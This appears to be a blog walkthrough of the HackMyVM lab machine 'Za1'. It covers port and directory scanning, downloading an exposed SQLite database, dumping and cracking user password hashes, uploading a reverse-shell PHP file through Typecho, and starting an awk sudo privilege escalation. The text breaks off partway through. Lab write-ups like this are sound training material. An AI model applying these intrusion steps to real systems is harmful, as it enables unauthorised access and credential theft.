{"id":560,"date":"2024-04-14T21:11:07","date_gmt":"2024-04-14T13:11:07","guid":{"rendered":"http:\/\/162.14.82.114\/?p=560"},"modified":"2024-04-14T21:11:07","modified_gmt":"2024-04-14T13:11:07","slug":"hmv-_-za1","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/560\/04\/14\/2024\/","title":{"rendered":"hmv[-_-]za1"},"content":{"rendered":"<h1>Za1<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110383.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110383.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414202913983\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110385.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110385.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414202926841\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.9 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 36:32:5b:78:d0:f4:3c:9f:05:1a:a7:13:91:3e:38:c1 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCiszwYYyjXll\/pr+K+GGq77l6g9Z5zhJbJpC3hth0Nm+QtBaasUz2i1\/ys4WOAExSDhc+kA5BU1IpX2dWSvWsk4JWKNy9zJuHux\/g3GBy9BwLusNzPTYWeUUa9iu5mwKD4Saj1mfM7BzMZggFXcyk8rFdm8Z\/DiLs41TbYn38av1diBd160wnfG6uYIScqFQh\/i9PUoeTMEOE7cVYSpWjbiym6Xu2l79YcP3SnMvygMVJZ8lfFI2Tr5QGYmRT3COLs00caTZ5dc8PuVbp90YAAj0UafgFcTAPtOK6ZlmffZch2oVAg4TG71fXwGoQqg7oTlBgqmrHN+pkpryZ53BBf\n|   256 72:07:82:15:26:ce:13:34:e8:42:cf:da:de:e2:a7:14 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIA8M\/o11TTI8tOkNw1O1Sk4AKfP35fuoc6WHuwtRGYRgWZ9JpG3qjL9qGRR+VzTxGZw1oGPPjK+5WbakGvJlm4=\n|   256 fc:9c:66:46:86:60:1a:29:32:c6:1f:ec:b2:47:b8:74 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXqZTpsGVeofSC4FHp5n\/f1hV+SZR6B\/Mvdviej5kRK\n80\/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))\n|_http-generator: Typecho 1.2.1\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Zacarx&#039;s blog\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.9 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.9\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,png,php,zip,git,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 276]\n\/index.php            (Status: 200) [Size: 6788]\n\/admin                (Status: 301) [Size: 310] [--&gt; http:\/\/172.20.10.9\/admin\/]\n\/install              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.9\/install\/]\n\/install.php          (Status: 302) [Size: 0] [--&gt; http:\/\/172.20.10.9\/]\n\/sql                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.9\/sql\/]\n\/LICENSE.txt          (Status: 200) [Size: 14974]\n\/var                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.9\/var\/]\n\/usr                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.9\/usr\/]\n\/.php                 (Status: 403) [Size: 276]\n\/server-status        (Status: 403) [Size: 276]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.9<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.9\n+ Target Hostname:    172.20.10.9\n+ Target Port:        80\n+ Start Time:         2024-04-14 08:31:16 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.29 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ Apache\/2.4.29 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/admin\/login.php?action=insert&amp;username=test&amp;password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user &#039;test&#039; password &#039;test&#039; to verify. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2002-0995\n+ \/install\/: Directory indexing found.\n+ \/install\/: This might be interesting.\n+ \/sql\/: Directory indexing found.\n+ \/LICENSE.txt: License file found may identify site software.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/admin\/login.php: Admin login page\/section found.\n+ \/var\/: Directory indexing found.\n+ \/var\/: \/var directory has indexing enabled.\n+ 8102 requests: 0 error(s) and 13 item(s) reported on remote host\n+ End Time:           2024-04-14 08:32:00 (GMT-4) (44 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110386.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110386.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414203212148\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u597d\u5bb6\u4f19\uff0c\u987a\u624b\u67e5\u4e00\u4e0b\u6f0f\u6d1e\u5427\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ searchsploit typecho 1.2.1          \nExploits: No Results\nShellcodes: No Results<\/code><\/pre>\n<p>\u679c\u7136\u4e0d\u662f\u8fd9\u65b9\u9762\u7684\u3002<\/p>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.9\/admin<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110387.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110387.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414203350805\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110388.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110388.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414203433881\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h3>\u67e5\u770b\u6570\u636e\u5e93<\/h3>\n<p>\u4e0b\u8f7d\u4e00\u4e0b\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff0c\u6587\u672c\u6253\u5f00\u53d1\u73b0\uff0c\u6700\u524d\u9762\u6709<code>SQLite format 3<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ wget http:\/\/172.20.10.9\/sql\/new.sql                                                       \n--2024-04-14 08:38:56--  http:\/\/172.20.10.9\/sql\/new.sql\nConnecting to 172.20.10.9:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 102400 (100K) [application\/x-sql]\nSaving to: \u2018new.sql\u2019\n\nnew.sql                               100%[=================================================&gt;] 100.00K  --.-KB\/s    in 0.001s  \n\n2024-04-14 08:38:56 (98.1 MB\/s) - \u2018new.sql\u2019 saved [102400\/102400]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ wget http:\/\/172.20.10.9\/sql\/sercet.sql\n--2024-04-14 08:39:04--  http:\/\/172.20.10.9\/sql\/sercet.sql\nConnecting to 172.20.10.9:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 102400 (100K) [application\/x-sql]\nSaving to: \u2018sercet.sql\u2019\n\nsercet.sql                            100%[=================================================&gt;] 100.00K  --.-KB\/s    in 0s      \n\n2024-04-14 08:39:04 (423 MB\/s) - \u2018sercet.sql\u2019 saved [102400\/102400]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ head new.sql                                                           \n\ufffd\ufffdpite f&#039;\ufffd\ufffd\ufffdTypechohttps:\/\/typecho.org127.0.0.1Typecho 1.2.1\u6b22\u8fce\u52a0\u5165 Typecho \u5927\u5bb6\u65cfcommentapproved\n\ufffd\ufffd\n\ufffd\ufffd      d\ufffd\ufffd\ufffd\n\ufffd       \ufffd       \ufffd\ufffd\n                  \ufffd\n                   \ufffde\ufffdH&#039;\ufffd&#039;             \u7231\u751f\u547dstartd\ufffd\ufffdd\ufffd\ufffd\ufffd&lt;!--markdown--&gt;\u6211\u4e0d\u53bb\u60f3\uff0c\n\u662f\u5426\u80fd\u591f\u6210\u529f \uff0c\n\u65e2\u7136\u9009\u62e9\u4e86\u8fdc\u65b9 \uff0c\n\u4fbf\u53ea\u987e\u98ce\u96e8\u517c\u7a0b\u3002\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ sqlite3 new.sql          \nSQLite version 3.44.2 2023-11-24 11:41:44\nEnter &quot;.help&quot; for usage hints.\nsqlite&gt; .tables;\nError: unknown command or invalid arguments:  &quot;tables;&quot;. Enter &quot;.help&quot; for help\nsqlite&gt; .tables\ntypechocomments       typechometas          typechousers        \ntypechocontents       typechooptions      \ntypechofields         typechorelationships\nsqlite&gt; select * from typechousers\n   ...&gt; ;\n1|zacarx|$P$BhtuFbhEVoGBElFj8n2HXUwtq5qiMR.|zacarx@qq.com|http:\/\/www.zacarx.com|zacarx|1690361071|1692694072|1690364323|administrator|9ceb10d83b32879076c132c6b6712318\n2|admin|$P$BERw7FPX6NWOVdTHpxON5aaj8VGMFs0|admin@11.com||admin|1690364171|1690365357|1690364540|administrator|5664b205a3c088256fdc807791061a18<\/code><\/pre>\n<h3>\u7206\u7834<\/h3>\n<p>\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ echo &#039;$P$BhtuFbhEVoGBElFj8n2HXUwtq5qiMR.&#039; &gt; zacarx_hash       \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ echo &#039;$P$BERw7FPX6NWOVdTHpxON5aaj8VGMFs0&#039; &gt; admin      \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ john zacarx_hash -w=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 256\/256 AVX2 8x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n0g 0:00:00:38 6.63% (ETA: 08:52:59) 0g\/s 28358p\/s 28358c\/s 28358C\/s 5121246003..50dgirl\nSession aborted\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ john admin -w=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 256\/256 AVX2 8x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n123456           (?)     \n1g 0:00:00:00 DONE (2024-04-14 08:44) 25.00g\/s 4800p\/s 4800c\/s 4800C\/s 123456..november\nUse the &quot;--show --format=phpass&quot; options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<h3>\u767b\u5f55\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff0c\u5c45\u7136\u662f\u5f31\u5bc6\u7801\u3002\u3002\u3002\u3002\u706f\u4e0b\u9ed1\u4e86\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110389.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110389.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414204527951\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110390.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110390.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414204637000\" \/><\/div><\/p>\n<p>\u5c45\u7136\u8fd8\u505a\u4e86\u89e3\u6790\u3002\u3002\u3002\u3002<\/p>\n<p>\u4fee\u6539\u4e0a\u4f20\u8bbe\u7f6e\u4e0a\u4f20\u53cd\u5f39shell\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110391.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110391.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414204802421\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5148\u6dfb\u52a0\u4e00\u4e0bdns\u89e3\u6790\uff1a<\/p>\n<pre><code class=\"language-apl\">172.20.10.9    za1.hmv<\/code><\/pre>\n<p>\u4fdd\u5b58\u4e00\u4e0b\uff0c\u7136\u540e\u5c1d\u8bd5\u4e0a\u4f20\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110392.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110392.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414204926144\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">http:\/\/za1.hmv\/usr\/uploads\/revershell.php<\/code><\/pre>\n<p>\u53d1\u5e03\u6587\u7ae0\u4e86\uff0c\u89e6\u53d1\u4e00\u4e0b\uff0c\u5b9e\u6d4b\u53d1\u73b0\u4fee\u6539\u4ee5\u540e\u5f39\u4e0d\u51fa\u6765\uff0c\u53ef\u80fd\u662f\u6211\u64cd\u4f5c\u6709\u95ee\u9898\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110393.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110393.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414205510604\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110394.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110394.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414205523728\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110395.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110395.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414205536932\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@za_1:\/$ ls\nbin   cdrom  etc   initrd.img      lib    lost+found  mnt  proc  run   snap  swap.img  tmp  var      vmlinuz.old\nboot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   sys       usr  vmlinuz\n(remote) www-data@za_1:\/$ cd \/home\n(remote) www-data@za_1:\/home$ ls\nza_1\n(remote) www-data@za_1:\/home$ cd za_1\/\n(remote) www-data@za_1:\/home\/za_1$ ls\nuser.txt\n(remote) www-data@za_1:\/home\/za_1$ ls -la\ntotal 44\ndrwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 .\ndrwxr-xr-x 3 root root 4096 Jul 26  2023 ..\nlrwxrwxrwx 1 za_1 za_1    9 Aug 22  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 za_1 za_1  220 Apr  4  2018 .bash_logout\n-rw-r--r-- 1 za_1 za_1 3771 Apr  4  2018 .bashrc\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .cache\ndrwx------ 3 za_1 za_1 4096 Jul 26  2023 .gnupg\n-rw-r--r-- 1 za_1 za_1  807 Apr  4  2018 .profile\ndrwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .root\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .ssh\n-rw-r--r-- 1 za_1 za_1    0 Jul 26  2023 .sudo_as_admin_successful\n-rw------- 1 za_1 za_1  991 Jul 26  2023 .viminfo\n-rw-r--r-- 1 za_1 za_1   23 Jul 26  2023 user.txt\n(remote) www-data@za_1:\/home\/za_1$ sudo -l\nMatching Defaults entries for www-data on za_1:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser www-data may run the following commands on za_1:\n    (za_1) NOPASSWD: \/usr\/bin\/awk<\/code><\/pre>\n<h3>awk\u63d0\u6743<\/h3>\n<p>\u53c2\u8003https:\/\/gtfobins.github.io\/gtfobins\/awk\/<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110396.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110396.png\" 